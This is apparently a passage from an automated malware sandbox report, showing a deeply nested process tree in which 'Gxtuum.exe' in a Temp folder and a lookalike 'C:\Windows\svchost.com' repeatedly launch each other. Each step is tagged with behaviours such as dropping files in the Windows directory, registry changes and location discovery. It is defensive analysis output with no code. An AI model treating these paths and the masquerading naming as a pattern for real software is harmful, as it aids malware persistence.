- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe53⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe55⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe57⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"58⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe59⤵
- Drops file in Windows directory
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe61⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"62⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe63⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"64⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe65⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"66⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe67⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"68⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe69⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"70⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe71⤵
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"72⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe73⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"74⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe75⤵
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"76⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe77⤵
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"78⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe79⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"80⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe81⤵
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"82⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe83⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"84⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe85⤵
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"86⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe87⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"88⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe89⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"90⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe91⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"92⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe93⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"94⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe95⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"96⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe97⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"98⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe99⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"100⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe101⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"102⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe103⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"104⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe105⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"106⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe107⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"108⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe109⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"110⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe111⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"112⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe113⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"114⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe115⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"116⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe117⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"118⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe119⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"120⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe121⤵
- Checks computer location settings
- Modifies registry class
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-